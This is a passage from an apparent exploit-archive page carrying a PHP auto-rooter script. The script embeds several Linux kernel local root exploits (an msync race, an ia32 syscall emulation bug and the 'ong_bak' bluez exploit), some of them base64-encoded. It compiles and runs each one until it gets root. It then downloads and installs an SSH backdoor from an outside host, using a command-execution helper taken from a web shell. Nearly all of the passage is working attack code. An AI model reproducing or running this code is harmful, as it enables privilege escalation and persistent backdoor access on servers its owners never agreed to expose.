swapmem[PAGE_SIZE*2] = \\\'x\\\';
printf(\\\"%p, evil mapped\\\\n\\\",ret);
printf(\\\"(sleep2)\\\\n\\\");
if (sem)
cleanup();
sendsig(t3);
usleep(300000);
printf(\\\"(sleep2 finished)\\\\n\\\");
if (sem)
cleanup();
munmap(vmamem, VMAFILL * PAGE_SIZE);
printf(\\\"doing msync\\\\n\\\");
printf(\\\"still doing msync\\\\n\\\");
ret = msync(swapmem + PAGE_SIZE * 2, PAGE_SIZE * 4, MS_SYNC);
printf(\\\"finished msync, %d, errno=%d\\\\n\\\", ret, errno);
if (ret == -1 && errno == 123) {
sem = 0;
killall();
printf(\\\"y4\\\'r3 1uCky k1d!\\\\n\\\");
setresuid(0, 0, 0);
setresgid(0, 0, 0);
execl(\\\"/bin/sh\\\", \\\"sh\\\", \\\"-i\\\", NULL);
printf(\\\"execve failed %d\\\\n\\\", errno);
}
if (!sem) {
printf(\\\":(\\\\n\\\");
cleanup();
}
_exit(0);
}

int main(int argc, char *argv[])
{
int i, n;
char *dummy = DBASE;

printf(\\\"linux kernel msync race condition\\\\nbug discovered by sd, 
further research by sd and *****\\\\nthis is development-in-progress code,
redistribution prohibited!\\\\n=============================================\\\\n\\\");

signal(SIGUSR1, sighand);
signal(SIGALRM, sighand);
setbuf(stdout, NULL);

i = open(SHAREFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);

mmap(FAKES_BASE, PAGE_ALIGN(sizeof(*fakes)), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED, i,0);
ftruncate(i, PAGE_ALIGN(sizeof(*fakes)));
build_fakevma();
t4 = fork();
if (!t4) {
while (1) {
fakes->t1++;
fakes->t2++;
sched_yield();
}
}
printf(\\\"creating fakepage\\\\n\\\");
create_fakepage(buf);
i = open(DUMMYFILE,O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(i, MAPSTEP);
write(i, buf, MAPSTEP);
for (n = 0; n < MEMSZ; n += MAPSTEP)
mmap(dummy + n, MAPSTEP, PROT_READ|PROT_WRITE, MAP_SHARED, i, 0);

fd3 = open(EATFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(fd3, 16384);
/* create the source junkfile */
fd1 = open(EATFILES, O_CREAT|O_RDWR|O_TRUNC, 0777);
alarm(EATTIME);
printf(\\\"done fakepage\\\\n\\\");
do {
int c;
c = write(fd1, buf, MAPSTEP);
if (c < MAPSTEP)
break;
bigsize += c;
printf(\\\"done %d Kb\\\\r\\\", bigsize / 1024);
} while (!gotsig);
printf(\\\"\\\\n\\\");
alarm(0);
gotsig = 0;
bigmem = mmap(base - bigsize, bigsize, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_SHARED, fd1, 0);
if (bigmem == MAP_FAILED)
cleanup();

t3 = fork();

if (!t3) {
wait4sig();
printf(\\\"starting aggresive write!\\\\n\\\");
write(fd3, bigmem, bigsize);
printf(\\\"done aggresive write!\\\\n\\\");
_exit(0);
}

t2 = clone(thread, thread_stack + sizeof(thread_stack) - 4,
0xf00, NULL);

swapmem = base;
if (mmap(swapmem, PAGE_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0)
== MAP_FAILED) cleanup();

/* create the swap */
printf(\\\"creating swapfile\\\\n\\\");
fd2 = open(SWAPFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(fd2, MEMSZ);
vmamem = swapmem + MEMSZ + 16*PAGE_SIZE;
// base += VMAFILL * PAGE_SIZE;

printf(\\\"vmamem = %p\\\\n\\\", vmamem);
mmap(swapmem + PAGE_SIZE, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, fd2, 0);
printf(\\\"swapmem = %p, swapsize = %d\\\\n\\\", swapmem, 2*PAGE_SIZE);
// getchar();

// munmap(vmamem, VMAFILL * PAGE_SIZE);

write(fd2, dummy, MEMSZ);
close(fd2);

printf(\\\"unlink\\\\n\\\");
unlink(SWAPFILE);


// core_stat();

build_fakevma();
sendsig(t2);
limg.ph.p_vaddr = (unsigned) swapmem + PAGE_SIZE;
limg.ph.p_memsz = PAGE_SIZE * 2;
make_lib(LIBFILE);
printf(\\\"started uselib\\\\n\\\");
time_start();
uselib(LIBFILE);
// munmap(swapmem + PAGE_SIZE, PAGE_SIZE);
time_end();
printf(\\\"uselib finished!\\\\n\\\");
sem = 1;
printf(\\\"pid %d\\\\n\\\",getpid());
// core_stat();
n = 0;
n = waitpid(t2, NULL, __WCLONE);
printf(\\\"waitpid got %d/%d\\\\n\\\", n, errno);
// killall();
cleanup();
}
");
$two_four[3] = base64_decode("LyoNCiAqIGV4cGxvaXQgZm9yIHg4Nl82NCBsaW51eCBrZXJuZWwgaWEzMnN5c2NhbGwgZW11bGF0aW9uDQogKiBidWcsIGRpc2NvdmVyZWQgYnkgV29qY2llY2ggUHVyY3p5bnNraSA8Y2xpcGhfYXRfaXNlYy5wbD4NCiAqDQogKiBieQ0KICogUm9iZXJ0IFN3aWVja2kgPHJvYmVydF9hdF9zd2llY2tpLm5ldD4NCiAqIFByemVteXNsYXcgRnJhc3VuZWsgPHZlbmdsaW5fYXRfZnJlZWJzZC5sdWJsaW4ucGw+DQogKiBQYXdlbCBQaXNhcmN6eWsgPHBhd2VsX2F0X2ltbW9zLmNvbS5wbD4NCiAqIG9mIEFUTS1MYWIgaHR0cDovL3d3dy5hdG0tbGFiLnBsDQogKi8NCg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy93YWl0Lmg+DQojaW5jbHVkZSA8c3lzL3B0cmFjZS5oPg0KI2luY2x1ZGUgPGludHR5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3JlZy5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8c3lzL21tYW4uaD4NCg0KdWludDMyX3QgdWlkLCBldWlkLCBzdWlkOw0KDQpzdGF0aWMgdm9pZCBrZXJuZWxtb2RlY29kZSh2b2lkKQ0Kew0KICAgICAgICBpbnQgaTsNCiAgICAgICAgdWludDhfdCAqZ3M7DQogICAgICAgIHVpbnQzMl90ICpwdHI7DQoNCiAgICAgICAgYXNtIHZvbGF0aWxlIChcXFwibW92cSAlJWdzOigweDApLCAlMFxcXCIgOiBcXFwiPXJcXFwiKGdzKSk7DQoNCiAgICAgICAgZm9yIChpID0gMjAwOyBpIDwgMTAwMDsgaSs9MSkgew0KDQogICAgICAgICAgICAgICAgcHRyID0gKHVpbnQzMl90KikgKGdzICsgaSk7DQoNCiAgICAgICAgICAgICAgICBpZiAoKHB0clswXSA9PSB1aWQpICYmIChwdHJbMV0gPT0gZXVpZCkNCiAgICAgICAgICAgICAgICAgICAgICAgICYmIChwdHJbMl0gPT0gc3VpZCkgJiYgKHB0clszXSA9PSB1aWQpKSB7DQogICAgICAgICAgICAgICAgICAgICAgICBwdHJbMF0gPSAwOyAvL1VJRA0KICAgICAgICAgICAgICAgICAgICAgICAgcHRyWzFdID0gMDsgLy9FVUlEDQogICAgICAgICAgICAgICAgICAgICAgICBwdHJbMl0gPSAwOyAvL1NVSUQNCg0KICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICB9DQoNCn0NCg0Kc3RhdGljIHZvaWQgZG9jYWxsKHVpbnQ2NF90ICpwdHIsIHVpbnQ2NF90IHNpemUpDQp7DQogICAgICAgIGdldHJlc3VpZCgmdWlkLCAmZXVpZCwgJnN1aWQpOw0KDQogICAgICAgIHVpbnQ2NF90IHRtcCA9ICgodWludDY0X3QpcHRyICYgfjB4MDAwMDAwMDAwMDBGRkYpOw0KDQogICAgICAgIGlmIChtbWFwKCh2b2lkKil0bXAsIHNpemUsIFBST1RfUkVBRHxQUk9UX1dSSVRFfFBST1RfRVhFQywNCiAgICAgICAgICAgICAgICBNQVBfUFJJVkFURXxNQVBfRklYRUR8TUFQX0FOT05ZTU9VUywgLTEsIDApID09IE1BUF9GQUlMRUQpIHsNCiAgICAgICAgICAgICAgICBwcmludGYoXFxcIm1tYXAgZmF1bHRcXFxcblxcXCIpOw0KICAgICAgICAgICAgICAgIGV4aXQoMSk7DQogICAgICAgIH0NCg0KICAgICAgICBmb3IgKDsgcHRyIDwgKHRtcCArIHNpemUpOyBwdHIrKykNCiAgICAgICAgICAgICAgICAqcHRyID0gKHVpbnQ2NF90KWtlcm5lbG1vZGVjb2RlOw0KDQogICAgICAgIF9fYXNtX18oXFxcIlxcXFxuXFxcIg0KICAgICAgICBcXFwiXFxcXHRtb3ZxICQweDEwMSwgJXJheFxcXFxuXFxcIg0KICAgICAgICBcXFwiXFxcXHRpbnQgJDB4ODBcXFxcblxcXCIpOw0KDQogICAgICAgIHByaW50ZihcXFwiVUlEICVkLCBFVUlEOiVkIEdJRDolZCwgRUdJRDolZFxcXFxuXFxcIiwgZ2V0dWlkKCksIGdldGV1aWQoKSwgZ2V0Z2lkKCksIGdldGVnaWQoKSk7DQogICAgICAgIGV4ZWNsKFxcXCIvYmluL3NoXFxcIiwgXFxcImJpbi9zaFxcXCIsIDApOw0KICAgICAgICBwcmludGYoXFxcIm5vIC9iaW4vc2ggPz9cXFxcblxcXCIpOw0KICAgICAgICBleGl0KDApOw0KfQ0KDQppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqKmFyZ3YpDQp7DQogICAgICAgIGludCBwaWQsIHN0YXR1cywgc2V0ID0gMDsNCiAgICAgICAgdWludDY0X3QgcmF4Ow0KICAgICAgICB1aW50NjRfdCBrZXJuX3MgPSAweGZmZmZmZmZmODAwMDAwMDA7DQogICAgICAgIHVpbnQ2NF90IGtlcm5fZSA9IDB4ZmZmZmZmZmY4NDAwMDAwMDsNCiAgICAgICAgdWludDY0X3Qgb2ZmID0gMHgwMDAwMDAwODAwMDAwMTAxICogODsNCg0KICAgICAgICBpZiAoYXJnYyA9PSA0KSB7DQogICAgICAgICAgICAgICAgZG9jYWxsKCh1aW50NjRfdCopKGtlcm5fcyArIG9mZiksIGtlcm5fZSAtIGtlcm5fcyk7DQogICAgICAgICAgICAgICAgZXhpdCgwKTsNCiAgICAgICAgfQ0KDQogICAgICAgIGlmICgocGlkID0gZm9yaygpKSA9PSAwKSB7DQogICAgICAgICAgICAgICAgcHRyYWNlKFBUUkFDRV9UUkFDRU1FLCAwLCAwLCAwKTsNCiAgICAgICAgICAgICAgICBleGVjbChhcmd2WzBdLCBhcmd2WzBdLCBcXFwiMlxcXCIsIFxcXCIzXFxcIiwgXFxcIjRcXFwiLCAwKTsNCiAgICAgICAgICAgICAgICBwZXJyb3IoXFxcImV4ZWMgZmF1bHRcXFwiKTsNCiAgICAgICAgICAgICAgICBleGl0KDEpOw0KICAgICAgICB9DQoNCiAgICAgICAgaWYgKHBpZCA9PSAtMSkgew0KICAgICAgICAgICAgICAgIHByaW50ZihcXFwiZm9yayBmYXVsdFxcXFxuXFxcIik7DQogICAgICAgICAgICAgICAgZXhpdCgxKTsNCiAgICAgICAgfQ0KDQogICAgICAgIGZvciAoOzspIHsNCiAgICAgICAgICAgICAgICBpZiAod2FpdCgmc3RhdHVzKSAhPSBwaWQpDQogICAgICAgICAgICAgICAgICAgICAgICBjb250aW51ZTsNCg0KICAgICAgICAgICAgICAgIGlmIChXSUZFWElURUQoc3RhdHVzKSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnRmKFxcXCJQcm9jZXNzIGZpbmlzaGVkXFxcXG5cXFwiKTsNCiAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOw0KICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgIGlmICghV0lGU1RPUFBFRChzdGF0dXMpKQ0KICAgICAgICAgICAgICAgICAgICAgICAgY29udGludWU7DQoNCiAgICAgICAgICAgICAgICBpZiAoV1NUT1BTSUcoc3RhdHVzKSAhPSBTSUdUUkFQKSB7DQogICAgICAgICAgICAgICAgICAgICAgICBwcmludGYoXFxcIlByb2Nlc3MgcmVjZWl2ZWQgc2lnbmFsOiAlZFxcXFxuXFxcIiwgV1NUT1BTSUcoc3RhdHVzKSk7DQogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsNCiAgICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICByYXggPSBwdHJhY2UoUFRSQUNFX1BFRUtVU0VSLCBwaWQsIDgqT1JJR19SQVgsIDApOw0KICAgICAgICAgICAgICAgIGlmIChyYXggPT0gMHgwMDAwMDAwMDAxMDEpIHsNCiAgICAgICAgICAgICAgICAgICAgICAgIGlmIChwdHJhY2UoUFRSQUNFX1BPS0VVU0VSLCBwaWQsIDgqT1JJR19SQVgsIG9mZi84KSA9PSAtMSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludGYoXFxcIlBUUkFDRV9QT0tFVVNFUiBmYXVsdFxcXFxuXFxcIik7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV4aXQoMSk7DQogICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgICAgICBzZXQgPSAxOw0KICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgIGlmICgocmF4ID09IDExKSAmJiBzZXQpIHsNCiAgICAgICAgICAgICAgICAgICAgICAgIHB0cmFjZShQVFJBQ0VfREVUQUNILCBwaWQsIDAsIDApOw0KICAgICAgICAgICAgICAgICAgICAgICAgZm9yKDs7KQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzbGVlcCgxMDAwMCk7DQogICAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYgKHB0cmFjZShQVFJBQ0VfU1lTQ0FMTCwgcGlkLCAxLCAwKSA9PSAtMSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnRmKFxcXCJQVFJBQ0VfU1lTQ0FMTCBmYXVsdFxcXFxuXFxcIik7DQogICAgICAgICAgICAgICAgICAgICAgICBleGl0KDEpOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KDQogICAgICAgIHJldHVybiAwOw0KfQ0K");
$two_four[4] = base64_decode("/*

Due to many responses i\\\'ve improved the exploit
to cover more systems!


  ONG_BAK v0.9   [october 24th 05]
\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"
o universal \\\"shellcode\\\" added
o try to use all possible memory regions
o bugfixes

qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222
-|-bluez local root exploit v.0.9  -by qobaiashi-
 |
 |- i\\\'ve found kernel 2.6.11.4-20a-default
 |- trampoline is at 0x804869c
 |- trying...
 |- [ecx: bf8d0000 ]
 |- suitable value found!using 0xbf8d0000
 |- the time has come to push the button...
sh-3.00# exit






  ONG_BAK v0.3   [april 8th 05]
\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"
ong_bak now checks the value of ecx and launches
the exploit in case a suitable value has been found!



  ONG_BAK v0.1   [april 4th 05]
\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"

local root exploit for the bluetooth bug

usage:

the bug is quite stable so you can\\\'t realy fuck things up
if you stick to the following:

play around with the negative argument until ecx points to 
our data segment:


qobaiashi@voyager:~> ./ong_bak -1002341
-|-local bluez exploit v.0.3  -by qobaiashi-
 |
 |- i\\\'ve found kernel 2.6.4-52-default
 |- trying...
 |- [ecx: 0b8f0f0f ]
qobaiashi@voyager:~> ./ong_bak -10023411
-|-local bluez exploit v.0.3  -by qobaiashi-
 |
 |- i\\\'ve found kernel 2.6.4-52-default
 |- trying...
 |- [ecx: 0809da40 ]
 |- suitable value found!using 0x0809da40
 |- the time has come to push the button..
qobaiashi@voyager:~> id
uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users)
qobaiashi@voyager:~>



that\\\'s it.
unfortunately it\\\'s not yet very practicable..

qobaiashi@u-n-f.com

*/

#include <sys/klog.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <sys/utsname.h>
#include <sys/mman.h>


void usage(char *path);

//===================[ kernel 2.6* privilege elevator ]===============================
//===================[      qobaiashi@u-n-f.com       ]===============================
//globals
int uid, gid;

extern load_highlevel;
__asm__
(
\\\"load_highlevel:         \\\\n\\\"
\\\"xor    %eax, %eax       \\\\n\\\"
\\\"mov    $0xffffe000, %eax\\\\n\\\"
\\\"and    %esp,%eax        \\\\n\\\"
\\\"pushl  %eax             \\\\n\\\"
\\\"call   set_root         \\\\n\\\"
\\\"pop    %eax             \\\\n\\\"
//ret to userspace-2.6.* version
\\\" cli                    \\\\n\\\"
\\\" pushl $0x7b            \\\\n\\\"      //DS user selector
\\\" pop   %ds              \\\\n\\\"
\\\" pushl %ds              \\\\n\\\"      //SS
\\\" pushl $0xc0000000      \\\\n\\\"      //ESP
\\\" pushl $0x246           \\\\n\\\"      //EFLAGS
\\\" pushl $0x73            \\\\n\\\"      //CS user selector
\\\" pushl $shellcode       \\\\n\\\"      //EIP must not be a push /bin/sh shellcode!!
\\\"iret                    \\\\n\\\"
);

void set_root(unsigned int *ts)
{
ts = (int*)*ts;
int cntr;
//hope you guys are int aligned
for(cntr = 0; cntr <= 512; cntr++, ts++)
    if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
      ts[0] = ts[1] = ts[4] = ts[5] = 0;

}


void shellcode()
{
system(\\\"/bin/sh\\\");
exit(0);
}
//====================================================================================
//====================================================================================





main(int argc, char *argv[])
{
char buf[2048];
int sock, *mod = (int*)buf;
int *linker = 0;

unsigned int arg;
int tmp;
char *check;
struct utsname vers;

gid  = getgid();
uid  = getuid();

printf(\\\"-|-bluez local root exploit v.0.9  -by qobaiashi-\\\\n |\\\\n\\\");
if (uname(&vers) < 0)
   printf(\\\" |- couldn\\\'t determine kernel version\\\\n\\\");

else
    printf(\\\" |- i\\\'ve found kernel %s\\\\n\\\", vers.release);
    

printf(\\\" |- trampoline is at %p\\\\n\\\", &load_highlevel);


if (argc < 2)
   {
    usage(argv[0]);
    exit(1);
    }

if (argc == 2)
    arg = strtoul(argv[1], 0, 0);


if (fork() != 0)//parent watch the Oops
   {
    //previous Oops printing
   usleep(1000);
   if ((tmp = klogctl(0x3, buf, 1700)) > -1)
       {
        check = strstr(buf, \\\"ecx: \\\");
        printf(\\\" |- [%0.14s]\\\\n\\\", check);
        check+=5;
        *(check+9) = 0x00;*(--check) = \\\'x\\\';*(--check) = \\\'0\\\';
        mod = (unsigned int*)strtoul(check, 0, 0);
        //page align FIXME: might be booggy
        int *ecx = mod;
        mod = (int)mod &~ 0x00000fff;
        linker = 
mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0);
        if(linker == mod)//we could mmap the area
          {
           printf(\\\" |- suitable value found!using %p\\\\n\\\", mod);
           printf(\\\" |- the time has come to push the button... \\\\n\\\");
           for (sock = 0;sock <= 1;sock++)          //use ecx
                *(ecx++) = (int)&load_highlevel;   //link to shellcode
           }

           else 
             {
              printf(\\\" |- could not mmap   %p\\\\n\\\", mod);
              if( brk((void*)mod+0x200 ) == -1)
                {
                 printf(\\\" |- could not brk to %p\\\\n\\\", mod);
                 printf(\\\" `-------------------------------\\\\n\\\");
                 exit(-1);
                 }
              //here we did it
              printf(\\\" |- suitable value found!using %p\\\\n\\\", mod);
              printf(\\\" |- the time has come to push the button... \\\\n\\\");
              for (sock = 0;sock <= 1;sock++)          //use ecx
                  *(ecx++) = (int)&load_highlevel;    //link to shellcode

              }
           if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
               exit(1);
                               
        }
   return 0;
   }

if (fork() == 0)//child does the pre-exploit
{
  printf(\\\" |- trying...\\\\n\\\");
  if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
      {
      printf(\\\" |- something went w0rng (invalid value)\\\\n\\\");
      exit(1);
     }
}

exit(0);
}



/*****************\\\\
|**    usage    **|
\\\\*****************/
void usage(char *path)
{
printf(\\\" |----------------------------\\\\n\\\");
printf(\\\" | usage: %s <negative value> \\\\n\\\", path);
printf(\\\" | tested:\\\\n\\\");
printf(\\\" | SuSE 9.1:      -10023411  \\\\n\\\");
printf(\\\" |                -41122122 \\\\n\\\");
printf(\\\" | Kernel 2.6.11: -10023 \\\\n\\\");
printf(\\\" | SuSE 9.3:      -100222\\\\n\\\");
printf(\\\" |                -102901\\\\n\\\");
printf(\\\" `-----------------------\\\\n\\\");
exit(0);
}
");

/***********************************
Functions
***********************************/

function trucmd($cmd) // hap hazardly barrowed and slightly modified from C99 shell
{
$result = "";
if (!empty($cmd))
{
if (is_callable("exec")) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
{
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
}
}
return $result;
}

function test() // compile a Hello World, see if the output is Hello World if not it won't work
{
$test = base64_decode("I2luY2x1ZGU8c3RkaW8uaD4NCg0KbWFpbigpDQp7DQogICAgcHJpbnRmKFwiSGVsbG8gV29ybGRcIik7DQoNCn0=");
$fh = fopen("e.c", 'w') or die("can't open file");
fwrite($fh, stripslashes($test));
fclose($fh);
if(trucmd("chmod 777 e.c; gcc -o new2 e.c; ./new2") != "Hello World")
{
echo "[!] gcc, or write access denied!";
unlink("e.c");
return FALSE;
}else{
unlink("new2");
unlink("e.c");
return TRUE;
}
}

function ex_create($dir, $array) // create exploits from the array
{
$x = 1;
if(!is_dir($dir))
{
mkdir($dir);
}
foreach($array as $exploit)
{
ex_write($dir, $exploit, $x);
$x++;
}
return $x;
}

function ex_write($dir, $data, $name) // wire exploit data
{
$fh = fopen("./$dir/$name.c", 'w') or die("can't open file");
fwrite($fh, stripslashes($data));
fclose($fh);
}

function get_kern() // getting kernel version via uname -r and eregi()
{
if(eregi('2.6',trucmd("uname -r")))
{
return "2.6";
}elseif(eregi('2.4',trucmd("uname -r")))
{
return "2.4";
}
}

function clean($dir) //read the directory, delete the files, before deleting the dir
{
$d = dir($dir);
while($entry = $d->read())
{
if ($entry!= "." && $entry!= "..")
{
unlink("./$dir/$entry");
}
}
$d->close();
rmdir($dir);
}

function finish($dir, $x, $port, $pass)
{
trucmd("./$dir/$x; wget hostfile.org/0_sshdoor.tgz; tar -zxvf sshdoor.tar.gz; cd sshdoor; ./install $pass $port");
}


function broot($dir, $max) // compile all the source, execute each one and if whoami equals root return true
{
global $port, $pass;
$max = $max -1;
for($x=1;$x<=$max;$x++)
{
if(trucmd("chmod 777 ./$dir/$x.c; gcc -o ./$dir/$x ./$dir/$x.c; ./$x; whoami") == "root")
{
echo "[+] Rooted with ./$dir/$x <br />";
echo "[+] Installing SSHdoor <br />";
finish($dir, $x, $port, $pass);
return TRUE;
}else{
echo "[~] Failed to root with ./$dir/$x <br />";
}
}
}

/***********************************
Executed Code
***********************************/
if(test())
{
echo "[+]Getting Kernel <br />";
if(get_kern() == "2.6")
{
echo "[+] Kernel Detected 2.6 <br />";
if(!broot($dir,ex_create($dir, $two_six)))
{
echo "[!] Failed to root, removing exploits & folder";
clean($dir);
}
}
else
{
echo "[+] Kernel Detected 2.4 <br />";
if(!broot($dir,ex_create($dir, $two_four)))
{
echo "[!] Failed to root, removing exploits & folder";
clean($dir);
}
}
}
?>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close